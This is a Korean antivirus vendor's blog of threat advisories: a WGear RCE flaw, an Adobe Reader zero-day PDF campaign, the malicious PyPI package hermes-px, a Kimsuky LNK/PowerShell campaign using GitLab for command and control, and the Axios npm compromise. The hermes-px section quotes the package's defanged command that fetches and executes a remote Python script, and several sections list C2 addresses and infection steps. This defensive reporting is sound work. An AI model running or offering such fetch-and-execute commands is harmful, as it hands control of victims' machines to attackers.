이스트시큐리티 알약 블로그

기업뱅킹 전자금융 소프트웨어(WGear) 취약점 관련 대응 안내

알약4 — Tue, 14 Apr 2026 15:04:33 +0900

2026년 4월 9일 금융보안원(FSI) 및 KISA에서 “기업뱅킹 전자금융서비스에 설치되는 엑셀 대용량 처리 프로그램(WGear)의 보안 취약점에 대한 공지”를 발표하였습니다.

이와 관련하여 알약 백신의 탐지 대응 현황을 아래와 같이 안내드립니다.

■ 취약점 개요

대상 소프트웨어: 엑셀 대용량 처리 프로그램(WGear) 1.100.10 버전 이하
취약점 유형: 원격 코드 실행 (Remote Code Execution, RCE)
해결 버전: v1.100.11 이상

■ 알약 백신 탐지 현황

취약한 버전의 파일에 대해 아래와 같은 정보로 탐지하고 있으며, 해당 항목이 탐지된 경우 취약한 버전의 프로그램이 설치된 경우 이므로 해당 프로그램 자체를 제거 또는 최신버전으로 업데이트 하시기 바랍니다.

해쉬값(MD5)	파일버전	알약 탐지명	업데이트 일자
2579344BB551B90D2C067B2D65061551	1.100.2.22319 1.100.3.1115	Misc.Riskware.WGear	2026.04.14
C29A0595DCF7A03F4D2BDC525DA7534D	1.100.2.22320 1.100.3.1116 1.100.7.0205	Misc.Riskware.WGear	2026.04.09
D6899FCB2E3E20E0251483D9CDB51257	1.100.2.25091 1.100.10	Misc.Riskware.WGear	2026.04.09

※ WGear 프로그램 삭제 방법

Windows 10: [설정] → [앱] → [앱 및 기능] 메뉴에서 WGear 제거
Windows 11: [설정] → [앱] → [설치된 앱] 메뉴에서 WGear 제거

■ 관련 보안 공지

금융보안원 https://sscs.fsec.or.kr/board/notice/019d6f6f-32d5-7d7f-9ed7-380884909b8a
KISA https://www.boho.or.kr/kr/bbs/view.do?searchCnd=&bbsId=B0000133&searchWrd=&menuNo=205021&pageIndex=1&categoryCode=&nttId=72023
WGear 보안 조치 안내 https://wtech.inswave.kr/wgear_guide/index.html?browser=Y

Adobe Reader 제로데이 취약점을 이용한 악성 PDF 공격 주의!

알약4 — Fri, 10 Apr 2026 16:58:58 +0900

[이미지] 생성형 AI 제작

최신 버전의 Adobe Reader 제로데이 취약점을 악용한 정교한 PDF 공격이 확인되었습니다.

이번 공격은 단순한 악성코드 실행을 넘어, 피해자의 시스템 정보를 은밀하게 수집하고 이를 기반으로 후속 공격을 선별적으로 수행하는 '핑거프린팅(Fingerprinting)' 방식을 채택한 것이 특징입니다.

해당 취약점은 현재 패치가 이루어지지 않은 제로데이 상태이며, 악성 PDF 파일만 열어도 공격이 트리거 된다는 점에서 사용자 개입 없이도 시스템 정보 탈취와 후속 원격 코드 실행(RCE)으로 이어질 수 있어 그 위험성이 매우 높습니다.

참고하세요

핑거프린팅(Fingerprinting): 공격 대상 시스템의 OS 버전, 설치된 소프트웨어 정보, 언어 설정 등 다양한 환경 정보를 수집해 '지문'처럼 식별하는 기법입니다. 공격자는 이를 통해 더 정밀한 후속 공격을 준비합니다.

■ 공격 개요

이번 공격에 사용된 악성 PDF 샘플은 2025년 11월 말에 처음 관찰되기 시작했으며, 이후 변종이 추가로 발견되는 등 최소 4개월 이상 지속된 APT(Advanced Persistent Threat) 캠페인의 일부로 분석됩니다. 최신 버전인 Adobe Reader 26.001.21367에서도 동작이 확인되었습니다.

특히 발견된 샘플 중 하나는 Invoice540.pdf(인보이스·청구서로 위장) 라는 파일명을 사용했으며, 내부에 러시아 석유·가스 산업 관련 내용을 담은 미끼 문서가 포함되어 있었습니다. 이를 통해 러시아 에너지 산업 관계자를 주요 표적으로 삼은 것으로 추정되고 있습니다.

[그림 1] Invoice540.pdf 파일 실행 화면

■ 악성 코드 구조 및 공격 흐름

악성 PDF는 다단계 난독화 구조로 설계되어 분석과 탐지를 모두 회피합니다.

1단계 - 난독화된 JavaScript 자동 실행
PDF를 여는 즉시, 별도의 클릭 없이 내부에 숨겨진 JavaScript가 자동 실행됩니다. 이 코드는 고도로 난독화되어 있으며, PDF 내 폼 오브젝트(btn1)에 Base64 형태로 저장된 추가 악성 코드를 꺼내 실행하는 구조입니다. 파일을 열어 검사하는 일반적인 탐지 방식으로는 악성 여부를 식별하기 어렵습니다.
2단계 - 시스템 핑거프린팅 (정밀 정보 수집)
악성 코드는 Adobe Reader에 내장된 API를 악용해 사용자 몰래 시스템 정보를 수집합니다. 수집되는 주요 정보는 다음과 같습니다.

수집항목	내용	공격자 활용 목적
Windows 버전	Windows 7/8.1/10/11 구분 및 세부 빌드 번호	버전별 맞춤형 후속 공격 준비
시스템 아키텍처	64비트 환경 여부	페이로드 종류 결정
Adobe Reader 정보	버전, 제품 종류(Reader/Pro), 언어 설정	취약점 공략 방식 선택
PDF 파일 경로	현재 열린 파일의 전체 저장 경로	파일 시스템 구조 파악
열린 문서 수	현재 Adobe에서 열려 있는 문서 개수	자동화된 분석 환경(샌드박스) 여부 추정

[표 1] 수집되는 항목

3단계 - 정보 전송 및 추가 명령 수신 (RSS.addFeed 악용)
수집된 시스템 정보는 RSS.addFeed() API를 통해 공격자 서버로 전송됩니다. 이 API는 단순히 데이터를 보내는 것을 넘어, 서버로부터 추가 JavaScript 코드를 수신하여 실행하는 역할도 수행합니다.
즉, 공격자는 피해자의 환경을 평가한 뒤 조건이 충족될 경우 원격에서 추가 악성 코드를 동적으로 주입할 수 있습니다.
악성 코드는 0.5초마다 서버 응답을 반복 확인하면서 페이로드 수신 기회를 모니터링하며, 서버에서 반환되는 페이로드는 네트워크 탐지를 우회하기 위해 AES 암호화된 형태로 전달됩니다.

■ 잠재적 피해 범위

이번 취약점이 악용될 경우 발생 가능한 피해는 다음과 같습니다.

로컬 파일 탈취
util.readFileIntoStream() API를 통해 Reader 프로세스가 접근 가능한 파일을 읽어 공격자 서버로 전송할 수 있습니다. 업무 문서, 설정 파일, 인증 정보가 포함된 파일 등이 대상이 될 수 있습니다.
시스템 환경 정보 유출
OS 버전, Reader 버전, 언어 설정, PDF 저장 경로 등 공격자의 후속 공격 설계에 활용될 수 있는 정밀한 환경 정보가 외부로 전송됩니다.
원격 코드 실행(RCE) 및 샌드박스 탈출(SBX)로 이어질 가능성
서버에서 반환되는 추가 JavaScript가 실행되는 구조상, 공격자가 적절한 조건을 만족하는 타깃을 식별할 경우 RCE 또는 SBX 익스플로잇을 동적으로 전달해 시스템 전체를 장악할 수 있습니다.

참고하세요

RCE(Remote Code Execution, 원격 코드 실행): 공격자가 피해자의 시스템에서 임의의 코드를 원격으로 실행할 수 있는 취약점입니다.
SBX(Sandbox Escape, 샌드박스 탈출): PDF 리더와 같은 애플리케이션은 보안을 위해 제한된 환경(샌드박스) 안에서 동작합니다. 샌드박스 탈출은 이 제한을 벗어나 시스템 전체에 접근하는 공격입니다.

■ 대응 권고

현재 Adobe는 이 취약점에 대한 공식 패치를 제공하지 않은 상태입니다. 패치가 배포되기 전까지 아래 조치를 통해 피해를 예방하시기 바랍니다.

개인 사용자

JavaScript 실행 비활성화
Adobe Reader 메뉴에서 기본설정→ JavaScript → 'Acrobat JavaScript 사용 가능' 항목 체크 해제를 적용합니다. 이 설정 하나만으로 이번 공격을 포함한 JavaScript 기반 PDF 공격의 대부분을 차단할 수 있습니다.
출처 불명 PDF 파일 열람 자제
신뢰할 수 없는 발신자로부터 받은 PDF는 열지 않습니다. 특히 인보이스, 청구서, 업계 문서로 위장한 파일에 주의가 필요합니다.
보호 모드·보호 보기 설정 확인 (Adobe Acrobat Pro 사용자 해당)
Adobe Reader의 보호 모드(Protected Mode) 및 보호 보기(Protected View)가 활성화되어 있는지 확인합니다. 두 기능이 모두 켜져 있으면 악성 PDF가 실행되더라도 피해를 최소화할 수 있습니다.
Adobe Reader 공식 패치 모니터링
Adobe의 공식 보안 공지를 주기적으로 확인하고, 패치가 배포되는 즉시 업데이트를 적용합니다.

보안 담당자

공격자 C2 서버 차단
현재까지 확인된 169.40.2.68:45191, 188.214.34.20:34123을 네트워크 수준에서 차단하고 접속 시도를 모니터링합니다. 단, 변종은 다른 인프라를 사용할 수 있으므로 IP 차단만으로는 충분하지 않습니다.
"Adobe Synchronizer" 트래픽 탐지 규칙 적용
User-Agent에 "Adobe Synchronizer" 문자열을 포함하는 HTTP/HTTPS 아웃바운드 트래픽을 탐지 규칙으로 설정합니다.
PDF 뷰어 대안 검토
보안이 중요한 업무 환경에서는 Adobe Reader 외 PDF 뷰어 프로그램 사용을 고려할 수 있습니다.

이번 공격은 단순히 하나의 소프트웨어 취약점을 악용하는 것을 넘어, 피해자를 정밀하게 선별해 후속 공격을 설계하는 APT 수준의 정교함을 보여줍니다. 특히 현재 패치가 존재하지 않는 제로데이라는 점, 그리고 인보이스·업무 문서로 위장해 의심 없이 열어보게 유도하는 방식은 일반 사용자와 기업 모두에게 실질적인 위협이 됩니다.

Adobe의 공식 패치가 배포될 때까지 JavaScript 비활성화와 출처 불명 PDF 열람 자제가 현재 가장 확실한 예방책임을 다시 한번 당부 드립니다.

[2026-04-13 업데이트된 내용 추가] 어도비, CVE-2026-34621 보안 패치 배포 (2026.04.11)

포스팅 당시 패치가 이루어지지 않았던 해당 제로데이 취약점(CVE-2026-34621)에 대해, 어도비에서 2026년 4월 11일 공식 보안 업데이트(APSB26-43)를 배포하였습니다.
이번 패치는 Windows 및 macOS 환경의 Adobe Acrobat DC, Acrobat Reader DC, Acrobat 2024를 대상으로 하며, 아래 버전 이하를 사용 중이라면 즉시 업데이트를 적용하시기 바랍니다.

제품명	취약한 버전(이하)	패치 버전
Acrobat DC (Continuous)	26.001.21367	26.001.21411
Acrobat Reader DC (Continuous)	6.001.21367	26.001.21411
Acrobat 2024 (Classic 2024)	24.001.30356	Windows: 24.001.30362 / Mac: 24.001.30360

[업데이트 방법]

Adobe Acrobat 또는 Reader를 사용 중이라면 아래 방법으로 즉시 최신 버전으로 업데이트하시기 바랍니다.

1. Adobe Acrobat / Reader 실행

2. 상단 메뉴 도움말(Help) > 업데이트 확인(Check for Updates) 클릭
3. 최신 버전으로 업데이트 진행

패치가 완료된 이후에도 출처를 알 수 없는 PDF 파일 열람은 각별히 주의하시고, 기존 포스팅에서 안내드린 보안 설정(JavaScript 비활성화, 보호 모드 활성화 등)은 계속 유지하시는 것을 권장드립니다.

취약점 관련 자세한 내용은 여기를 참고하시기 바랍니다.

[참고 출처]

https://justhaifei1.blogspot.com/2026/04/expmon-detected-sophisticated-zero-day-adobe-reader.html
https://thehackernews.com/2026/04/adobe-reader-zero-day-exploited-via.html

PyPI에 등록된 가짜 AI 프록시 패키지, 사용자 프롬프트 탈취

알약4 — Wed, 8 Apr 2026 15:43:18 +0900

[이미지] 생성형 AI 제작

최근 파이썬 공식 패키지 저장소 PyPI에서 AI 프록시 도구로 위장해 백그라운드에서 사용자의 민감한 데이터를 은밀하게 탈취하는 악성 파이썬 패키지(hermes-px)가 발견되었습니다.

해당 패키지는 Tor 네트워크를 통해 AI 요청을 익명으로 처리해 주는 무료 프록시 도구를 표방했지만, 실제로는 사용자가 AI에 입력한 모든 대화 내용을 공격자 서버로 전송하는 정보 탈취형 악성 패키지였습니다.
API 키 없이 무료로 사용할 수 있다는 점을 내세워 AI 개발 도구를 찾는 개발자들을 주요 타깃으로 삼았습니다.

공격 개요 및 흐름

hermes-px 악성 패키지는 'EGen Labs'라는 가상의 회사가 개발한 제품으로 위장했습니다.

상세한 설치 안내, 코드 예제, OpenAI Python SDK 마이그레이션 가이드, RAG(Retrieval-Augmented Generation:검색 증강 생성) 파이프라인 구성 예시까지 갖춘 완성도 높은 문서를 제공했으며, API 구조도 OpenAI SDK와 동일하게 설계해 기존 개발자들이 별도 학습 없이 바로 사용할 수 있도록 했습니다.

참고하세요

RAG(Retrieval-Augmented Generation): AI가 답변을 생성할 때 외부 데이터를 검색해서 참조하도록 하는 기술입니다.

[그림 1] PyPI에 게시된 악성 패키지 (출처: JFrog)

패키지 README 파일에는 사용자가 urllib.request와 exec()를 사용하여 GitHub URL에서 Python 스크립트를 직접 가져와 실행하는 방법을 안내하는 "대화형 학습 CLI(Interactive Learning CLI )" 기능도 포함되어 있었습니다.

python -c "import urllib.request; exec(urllib.request.urlopen('hxxps[:]//raw[.]githubusercontent[.]com/EGenLabs/hermes/main/demo/hermes_learn[.]py').read())"

이를 통해 공격자는 패키지를 새로 배포하지 않고도 추가 악성 코드를 피해 시스템에 실행할 수 있는 별도의 공격 채널을 확보해 두었습니다.

실제 공격은 다음과 같은 순서로 이루어집니다.

단계	내용
1단계	개발자가 PyPI에서 hermes-px를 설치하고 프로젝트에 통합
2단계	사용자의 AI 요청이 Tor를 통해 튀니지 대학교 내부 AI 시스템으로 무단 우회
3단계	대학 서버에서 생성된 AI 응답을 받아 제공사 흔적을 변조한 뒤 사용자에게 반환
4단계	사용자의 모든 대화 내용이 공격자 서버로 실시간 전송

[표 1] 공격 흐름

공격의 주요 특징

타인의 AI 인프라 무단 도용
악성패키지가 API 키 없이 무료로 AI를 제공할 수 있었던 것은 튀니지 최대 사립대학인 Universite Centrale의 내부 AI 시스템을 무단으로 사용했기 때문입니다. 이 대학이 학생 진로 상담용으로 운영하는 내부 서비스를 사용자 몰래 연결한 방식입니다.

접속 시에는 실제 학생이 사용하는 것처럼 위조된 브라우저 정보를 함께 전송했으며, Tor를 통해 우회함으로써 대학 측이 실제 접속자를 추적하기 어렵게 만들었습니다.
AI 응답이 반환될 때는 'OpenAI', 'ChatGPT' 같은 실제 제공사 흔적을 'EGen Labs', 'AXIOM-1'로 자동 교체하는 응답 위조 기능도 내장되어 있었습니다.

[그림 2] 응답 위조 코드 (출처: JFrog)

Claude 내부 시스템 프롬프트 탈취 및 재활용
패키지 내부에는 base_prompt.pz 라는 압축 파일이 숨겨져 있으며, 압축파일 내부에는 24만 6천 자(246,000자) 분량의 시스템 프롬프트가 존재합니다.
분석 결과 이는 최근 유출된 Anthropic의 AI 서비스 Claude Code의 내부 시스템 프롬프트를 탈취해 변조한 것으로 확인되었습니다.

공격자는 원문의 'Claude'를 'AXIOM-1'로, 'Anthropic'을 'EGen Labs'로 일괄 교체를 시도했으나 작업이 불완전하게 이루어졌습니다. 'Claude' 6곳, 'Anthropic' 2곳이 원문 그대로 남아 있었고, recommend_claude_apps 같은 Claude 고유의 내부 함수명, /mnt/user-data/uploads 같은 전용 파일 경로 등도 그대로 포함되어 있어 출처를 확인할 수 있었습니다.
이 프롬프트는 사용자의 API 요청마다 함께 주입되어, EGen Labs가 자체 개발한 독자적인 AI인 것처럼 포장하는 데 활용되었습니다.

[그림 3] 변조된 프롬프트(좌) 원문 프롬프트(우) 비교 (출처: JFrog)

익명성 약속을 역이용한 IP 주소 탈취
패키지가 가장 강조한 기능은 Tor를 통한 익명성 보장이었으나, 실제로 AI 요청은 Tor를 경유했지만, 사용자의 대화를 공격자 서버로 전송하는 과정은 Tor를 전혀 거치지 않고 사용자의 실제 인터넷 연결로 직접 이루어졌습니다.
결과적으로 익명성을 약속한 패키지가 오히려 사용자의 실제 IP 주소를 공격자에게 넘겨주는 구조였습니다. 소스코드 안에는 이를 의도적으로 설계했음을 드러내는 주석이 남아 있었습니다.

//Direct request bypasses the Tor session to avoid proxy overhead

3중 난독화로 탐지 회피
서버 주소, 인증 정보, 시스템 프롬프트 등 패키지 내 모든 민감한 데이타는 XOR 암호화(210바이트 순환 키) → zlib 압축 → Base64 인코딩의 3단계를 거쳐 숨겨졌습니다.
파일 어디에도 읽을 수 있는 형태의 악성 URL이나 키가 존재하지 않으며, 모든 값은 실행 중 메모리에서만 복호화됩니다.
파일을 열어 문자열을 직접 검사하는 정적 분석 방식으로는 탐지가 사실상 어려운 구조입니다.

피해 범위

hermes-px를 설치하고 사용한 개발자라면 다음과 같은 피해가 발생했을 수 있습니다.

대화 내용 전체 탈취
AI에 입력한 모든 프롬프트와 응답이 공격자 서버에 수집되기 때문에 소스코드, API 키, 내부 시스템 주소, 고객 정보 등 업무상 민감한 내용이 포함되었을 가능성이 있습니다.
실제 IP 주소 노출
익명성을 약속한 패키지가 실제로는 사용자의 IP 주소를 공격자에게 그대로 전달했습니다.
2차 악성 코드 실행 가능성
README의 안내에 따라 GitHub 스크립트를 실행한 경우, 추가 악성 페이로드가 설치되었을 수 있습니다.
대학 인프라 무단 사용
직접 설치한 개발자뿐 아니라, 패키지가 무단으로 사용한 Universite Centrale 역시 자체 인프라를 도용당하는 피해를 입었습니다.

대응 권고

hermes-px를 설치한 적이 있다면 즉시 아래 조치를 취하시기 바랍니다.

패키지 즉시 삭제
터미널에서 pip uninstall hermes-px를 실행합니다.
자격 증명 전면 교체
패키지를 통해 전달한 내용에 포함되었을 수 있는 API 키, 비밀번호, 내부 토큰 등을 모두 폐기하고 재발급합니다.
대화 내용 전수 점검
해당 패키지를 통해 오간 모든 메시지는 공격자에게 수집된 것으로 간주하고, 민감한 정보 포함 여부를 검토해야 합니다.
악성 도메인 차단
공격자 서버인 urlvoelpilswwxkiosey[.]supabase[.]co로의 접속을 네트워크 수준에서 차단하고 통신 시도를 모니터링합니다.
Tor 구성 요소 제거
이번 패키지 설치 과정에서 Tor가 함께 설치된 경우 제거하는 것이 안전합니다.

이번 악성 패키지 공격은 AI 개발 도구에 대한 수요를 겨냥한 공급망 공격이 얼마나 정교하게 설계될 수 있는지를 잘 보여주는 사례라 할 수 있습니다. 기술적 복잡성보다 사용자의 신뢰를 단계적으로 구축하는 방식으로 설계되었으며, 실제로 동작하는 AI 기능을 제공해 의심을 차단했다는 점이 특징적입니다.

특히 AI 서비스의 내부 시스템 프롬프트가 탈취되어 악성 패키지의 구성 요소로 재활용된 사실은, AI 자산 보호와 공급망 보안 관리의 중요성을 다시 한번 상기시켜 줍니다.

오픈소스 패키지를 도입할 때는 편리함보다 검증을 우선하는 습관이 필요합니다.

[참고]

https://cybersecuritynews.com/trojanized-pypi-ai-proxy-uses-stolen-claude-prompt/
https://research.jfrog.com/post/hermes-px-pypi/

GitLab 플렛폼을 이용한 Kimsuky 공격 사례

알약4 — Fri, 3 Apr 2026 18:32:31 +0900

[이미지] 생성형 AI 제작

이스트시큐리티 대응센터(ESRC)에서 운영 중인 APT TDS(Threat Detection System)에서는 최근 이력서 및 대북 정책 문서로 위장한 악성 LNK(바로가기) 파일의 유포 정황을 포착했습니다.

TDS에서 탐지된 악성 LNK 파일은 총 2종으로, 각각 구직자의 자기소개서와 북한 관련 정책 문서로 위장하고 있습니다.

이소연 자기소개서.pdf.lnk
2df24d850d6a50410e6503bc449a61778e5e88722ea4e20e198ea61e45a6903e.lnk

[그림 1] APT TDS에서 탐지된 악성 LNK 파일 화면

[그림 2] PDF 파일로 위장한 악성 LNK 파일

분석 결과 해당 LNK 파일은 북 배후 공격그룹인 김수키(Kimsuky) 그룹의 전형적인 LNK 기반 공격방식을 따르고 있어 이번 공격 역시 해당 그룹의 소행으로 판단됩니다.

다만 C2 서버로 깃허브(GitHub)를 활용하던 과거 방식과 달리 이번 공격에서는 깃랩(GitLab) 플렛폼을 사용하였습니다.

두 파일의 내부 공격 구조와 최종 페이로드는 동일하며, LNK 파일 실행 시 백그라운드에서 다단계 파워셸(PowerShell) 스크립트가 실행되어 시스템 정보를 수집하고 암호화하여 외부로 전송합니다.

공격 흐름

1. 최초 감염 벡터 - LNK 파일

사용자가 정상 문서 파일로 오인하여 LNK 파일을 실행하면 LNK 내부의 난독화 된 파워셸 명령이 복호화 된 후 %APPDATA% 경로에 firefox.ps1 이름으로 저장되어 실행됩니다.

[그림 3] LNK 파일 내부 난독화 된 파워셸 스크립트

2. 1차 드롭퍼 (firefox.ps1) - 탐지 회피와 지속 감염 환경 구성

Firefox.ps1 파일은 공격의 초기 준비를 모두 담당하는 핵심 스크립트로서 실행 시 다음 네 가지 동작을 순차적으로 수행합니다.

파일명	변경 파일명	폴더 경로	행위
docx.pdf	이소연 자기소개서.pdf	%TEMP%	디코이 PDF
Yahoo.rtf	Yahoo.jse	%AppData%\Microsoft\Windows\Templates	지속성 유지 스크립트
Yahoo.jse	facebook.ps1	%AppData%\Microsoft\Windows\CloudStore	2차 다운로더
Ajobcall.txt	news.ps1	%AppData%	최종 페이로드(정보탈취)

[표 1] 단계별 생성 파일 목록

2-1) 미끼 PDF 파일 표시

GitLab 저장소에서 미끼용 docx.pdf 를 내려받아 %TEMP% 경로에 악성 LNK 파일에 따라 '이소연 자기소개서.pdf’ 또는 북한대외전략분석_및_남북관계개선방안.pdf 이름으로 저장하여 실행됩니다.
사용자에게는 정상적인 PDF 문서파일 보여주며 의심을 피합니다.

[그림 4] 미끼파일로 사용된 정상 PDF 파일 (1)

[그림 5] 미끼파일로 사용된 정상 PDF 파일 (2)

2-2) 지속성 확보 - 스케줄러 등록

GitLab 저장소에서 Yahoo.rtf 파일을 다운로드 하여%AppData%\Microsoft\Windows\Templates 경로에 Yahoo.jse 이름으로 저장한 뒤, Yahoo.jse 악성 스크립트 파일이 반복 실행되도록 다음과 같은 이름으로 스케줄러를 등록합니다.

스케줄러명: MicrosoftEdgeUpdateTaskMachineGGswr{F60293632-35R-4A2F-96A8-03C3ECD693f5}
실행 주기 : 10분 지연 시작, 이후 35분 간격 반복

[그림 6] 등록된 작업 스케줄러

2-3) 2차 다운로더 설치 - facebook.ps1 생성

Yahoo.jse 스크립트 내 인코딩된 문자열을 디코딩하여 메모리 내에서 2차 파워셸 스크립트를 구성한 뒤 %AppData%\Microsoft\Windows\CloudStore\ 경로에 facebook.ps1 이름으로 저장합니다.

2-4) 최종 페이로드(news.ps1) 즉시 실행 - news.ps1 최초 실행

GitLab 저장소에서 암호화된 형태로 저장된 ajobcall.txt 파일을 내려받아 복호화한 뒤, news.ps1이라는 이름으로 저장하고 즉시 실행합니다. 실행이 완료되면 스크립트 자신을 삭제하여 흔적을 지웁니다.

3. 2차 다운로더 (facebook.ps1) - 35분마다 반복되는 정보탈취

facebook.ps1은 2단계에서 등록된 예약 작업에 의해 35분 주기로 반복 실행되는 2차 다운로더로써 GitLab 저장소에서 암호화된 scall.txt 파일을 다운받아 복호화한 뒤 news.ps1로 저장하고 실행합니다.

[그림 7] news.ps1 생성 코드

보안 솔루션의 탐지를 우회하기 위해 스크립트 내부 코드 일부를 분리된 조각으로 나눠 저장하고 실행 시점에 조립하는 방식을 사용합니다.

이를 통해 공격자는 GitLab 저장소의 scall.txt 파일만 교체하면, 피해자 시스템에서 실행되는 악성코드를 언제든지 원격으로 업데이트할 수 있습니다.

4. 최종 페이로드(news.ps1) - 정보탈취형 악성코드

2단계(firefox.ps1)와 3단계(facebook.ps1) 파워셸 스크립트는 모두 최종적으로 동일한 정보탈취 악성코드인 news.ps1을 실행합니다.

해당 파워셸 스크립트는 정보수집 → 암호화 → 유출 → 흔적 삭제 순서로 동작하며, 실행 후 어떠한 흔적도 남기지 않도록 설계되었습니다.

4-1) 감염 시스템 식별 정보 수집

Windows에 내장된 시스템 관리 기능인 WMI(Windows Management Instrumentation)를 이용해 감염 시스템에서 다음과 같은 정보를 수집합니다.

활성화된 로컬 IP 주소 수집
시스템 마지막 부팅 시간 수집

수집된 정보는 다음과 같은 규칙으로 파일명이 생성되어 %AppData% 경로에 저장됩니다.

규칙: <IP Address>-<MMdd_HHmm>-XXX-kkk.txt

[그림 8] 수집된 정보 파일 저장 코드

4-2) 수집 데이터 암호화

수집된 정보는 외부로 전송하기 전에 AES-256 방식으로 암호화합니다. 수집된 데이터를 암호화하여 전송하기 때문에, 네트워크 보안 장비가 트래픽 내용을 확인해도 악성 행위임을 판별하기 어렵습니다.

4-3) GitLab API를 통한 데이터 유출

암호화된 파일을 Base64로 인코딩한 뒤 공격자가 미리 설정해 둔 GitLab API 토큰을 이용해 공격자 저장소로 전송합니다.

업로드 경로: report/<IP주소>-<날짜시간>-XXX-kkk.txt.enc

[그림 9] GitLab 저장소 업로드 경로

4-4) 흔적 삭제
전송이 완료되면 수집된 원본 파일, 암호화된 업로드 파일, 실행된 스크립트 자신까지 모두 강제 삭제합니다. 이는 감염 시스템에 남는 흔적을 최소화하여 사용자가 감염 사실을 인지하기 어렵게 만들고, 사후 추적을 방해하기 위한 목적으로 볼 수 있습니다.

공격 특징

이번 공격에서 확인된 주요 공격 특징을 정리하면 다음과 같습니다.

이중 확장자와 미끼 파일을 활용한 위장 공격
.pdf.lnk와 같은 이중 확장자 형태로 파일명을 구성하여 사용자가 정상적 문서 파일로 오인 하도록 유도했으며, 미끼 파일을 활용해 감염 사실을 인지하기 어렵게 만듭니다.
합법적 서비스(GitLab) 악용
별도의 악성 서버 없이 GitLab을 C2로 활용함으로써 네트워크 탐지 시스템을 효과적으로 우회합니다. 443 포트 HTTPS 트래픽이고 도메인 자체가 신뢰 대상이기 때문에, 방화벽과 IPS 기반 차단이 어려우며, C2 저장소 삭제만으로 증거가 즉시 소멸될 수 있어 추적을 피하기 쉽습니다.
다단계 구조를 통한 탐지 우회
LNK 파일 → 1차 스크립트 → 2차 스크립트 → 정보탈취 스크립트로 이어지는 다단계 구조를 사용하여 각 단계에서 보안 솔루션의 탐지 가능성을 분산시킵니다.
악성 코드 자체도 암호화된 형태로 배포되기 때문에 파일 기반 정적 탐지를 우회합니다.
예약 작업 위장을 통한 지속성 확보
Microsoft Edge 업데이트 작업명으로 위장한 예약 작업을 통해 시스템 재부팅 이후에도 35분 주기로 악성 스크립트가 반복 실행됩니다. 공격자는 이 구조를 이용해 GitLab 저장소의 파일만 교체하면 피해자 시스템에서 실행되는 악성코드를 원격으로 업데이트할 수 있습니다.
증거 인멸을 위한 흔적 삭제
정보 전송 완료 후 수집 파일, 암호화 파일, 스크립트 자신까지 모두 강제 삭제하여 감염 시스템에 흔적을 최소화합니다.

이번 공격은 .pdf.lnk와 같은 이중 확장자로 정상 문서처럼 위장하고, 클릭 시 실제 정상 문서 파일을 함께 보여주는 미끼 파일 기법을 활용하여 사용자가 감염 사실을 인지하기 어렵게 만듭니다.

또한 합법적인 플랫폼인 깃랩을 C2 서버로 악용해 정상 트래픽으로 위장함으로써 네트워크 보안 장비의 탐지까지 우회하는 정교한 공격입니다.

이러 공격을 예방하기 위해서는 출처가 불분명한 파일의 실행을 자제해 주시고, 특히 윈도우 탐색기의 '파일 확장명 표시' 옵션을 상시 활성화하여, 이중 확장자로 위장한 파일은 실행하지 않도록 각별히 주의하시기 바랍니다.

IoC

Indicator	Type	Description	Detection Name
5577fffb5b5acd3771ef9dc696498f1e	MD5	LNK 파일	Trojan.Agent.LNK.Gen
302725413076d1aeaee2d7f2b3692646	MD5	LNK 파일	Trojan.Agent.LNK.Gen
hxxps[://]gitlab[.]com/arkiler-group/at	gitlab 저장소
hxxps[://]gitlab[.]com/kevin-group5101713/ri/hifer	gitlab 저장소

Axios NPM 패키지 공급망 공격 발생

알약4 — Wed, 1 Apr 2026 13:22:28 +0900

[이미지] 생성형 AI 제작

최근 Axios의 공식 저장소(NPM)를 통해 악성 코드가 유포되는 공격이 발생했습니다.

북한 배후의 해킹 그룹에 의한 것으로 분석되는 이번 공격은, 해당 프로그램을 관리하는 공식 개발자의 계정을 탈취하고 정교한 은폐 기법을 사용하여 전 세계 개발 환경 침투를 시도했습니다.

Axios (액시오스): 자바스크립트(JavaScript) 환경에서 서버와 데이터를 주고받기 위해 사용하는 HTTP 클라이언트 라이브러리입니다. 브라우저와 Node.js 환경 모두에서 동작하며, API 호출 및 데이터 수신에 있어 표준처럼 사용되는 매우 대중적인 오픈소스 도구입니다.

NPM (Node Package Manager): 개발자들이 작성한 코드 패키지를 공유하고 관리하는 오픈소스 소프트웨어 저장소(Registry) 입니다. 개발자는 필요한 기능을 직접 구현하는 대신, NPM에 등록된 검증된 패키지를 자신의 프로젝트에 '의존성(Dependency)'으로 추가하여 개발 효율을 높입니다.

공격 개요 및 흐름

공격자는 Axios 공식 관리자 계정을 탈취하여 정상적인 패키지 업데이트 과정에 악성 의존성을 주입하고, 이를 통해 최종적으로 강력한 원격 제어 도구(RAT)를 유포했습니다.

1. 계정 탈취 및 악성 패키지 업로드

공격자는 탈취한 계정으로 axios@1.14.1 및 0.30.4 버전을 게시했습니다. 이 과정에서 plain-crypto-js@4.2.1 패키지를 필수 의존성(dependency)으로 추가했습니다.

2. 자동 실행 메커니즘

사용자가 npm install axios를 실행하면, plain-crypto-js 내의 postinstall 스크립트를 통해 node setup.js 가 자동 실행됩니다.

3. 플랫폼별 맞춤형 드롭퍼 실행

setup.js는 시스템 OS를 식별한 후 최적화된 2차 드롭퍼(Dropper)를 내려받습니다.

macOS: AppleScript 기반 페이로드
Windows: VBScript 및 PowerShell 기반 페이로드
Linux: Python 기반 드롭퍼

4. RAT 유포

드롭퍼를 통해 최종적으로 설치되는 페이로드는 RAT(Remot Access Trojan)이며, 해당 RAT는 시스템에 상주하며 내부시스템 조회, 원격 명령 실행 등 감염 시스템을 제어합니다.

5. 정교한 흔적 제거

악성 동작 완료 후 setup.js는 자기 자신과 악성 package.json을 삭제합니다. 이후 미리 준비해둔 package.md 파일을 package.json으로 이름을 변경하여 정상 패키지로 보이도록 위장했습니다.

침해 여부 점검 가이드

프로젝트 및 시스템 환경에서 아래 4단계 절차를 통해 악성 코드 노출 여부를 점검하시기 바랍니다.

1단계 - 프로젝트 내 악성 Axios 버전 확인
터미널에서 아래 명령어를 실행하여 문제가 된 버전이 설치되어 있는지 확인합니다.

npm list axios 2>/dev/null | grep -E "1\.14\.1|0\.30\.4"
grep -A1 '"axios"' package-lock.json | grep -E "1\.14\.1|0\.30\.4"

2단계 - 악성 의존성 패키지 존재 여부 확인

node_modules 디렉토리 안에 악성 페이로드를 담고 있는 폴더가 있는지 확인합니다.

ls node_modules/plain-crypto-js

공격자가 흔적을 지웠다면 해당 폴더 안의 setup.js나 package.json이 깨끗한 파일로 대체되었을 수 있기 때문에 폴더가 존재한다는 사실만으로도 드롭퍼가 실행된 것으로 볼 수 있습니다.

